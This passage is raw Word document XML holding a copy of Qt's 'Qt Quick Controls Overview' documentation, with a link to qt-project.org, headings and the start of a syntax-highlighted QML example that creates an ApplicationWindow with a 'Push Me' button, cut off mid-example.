        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00490E7E" w:rsidP="00242E0B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId547" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00C76116">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtquickcontrols/qtquickcontrols-overview.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="718" w:name="_Toc483000683"/>
      <w:bookmarkStart w:id="719" w:name="_Toc483003700"/>
      <w:bookmarkStart w:id="720" w:name="_Toc483604035"/>
      <w:bookmarkStart w:id="721" w:name="_Toc483605255"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Controls Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="718"/>
      <w:bookmarkEnd w:id="719"/>
      <w:bookmarkEnd w:id="720"/>
      <w:bookmarkEnd w:id="721"/>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Qt Quick Controls provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B42CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set of UI controls to create user interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Qt Quick.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="722" w:name="getting-started"/>
      <w:bookmarkStart w:id="723" w:name="_Toc483000684"/>
      <w:bookmarkStart w:id="724" w:name="_Toc483003701"/>
      <w:bookmarkStart w:id="725" w:name="_Toc483604036"/>
      <w:bookmarkStart w:id="726" w:name="_Toc483605256"/>
      <w:bookmarkEnd w:id="722"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Getting Started</w:t>
      </w:r>
      <w:bookmarkEnd w:id="723"/>
      <w:bookmarkEnd w:id="724"/>
      <w:bookmarkEnd w:id="725"/>
      <w:bookmarkEnd w:id="726"/>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The QML types can be imported into your application using the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00B42CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement in your</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Controls </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="727" w:name="creating-a-basic-example"/>
      <w:bookmarkStart w:id="728" w:name="_Toc483000685"/>
      <w:bookmarkStart w:id="729" w:name="_Toc483003702"/>
      <w:bookmarkStart w:id="730" w:name="_Toc483604037"/>
      <w:bookmarkStart w:id="731" w:name="_Toc483605257"/>
      <w:bookmarkEnd w:id="727"/>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating a basic example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="728"/>
      <w:bookmarkEnd w:id="729"/>
      <w:bookmarkEnd w:id="730"/>
      <w:bookmarkEnd w:id="731"/>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A basic example of a QML file that makes use of controls is shown here:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.2</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApplicationWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    title</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"My Application"</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    width</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>640</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    height</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>480</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    visible</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        text</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Push Me"</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>centerIn</w:t>
      </w:r>
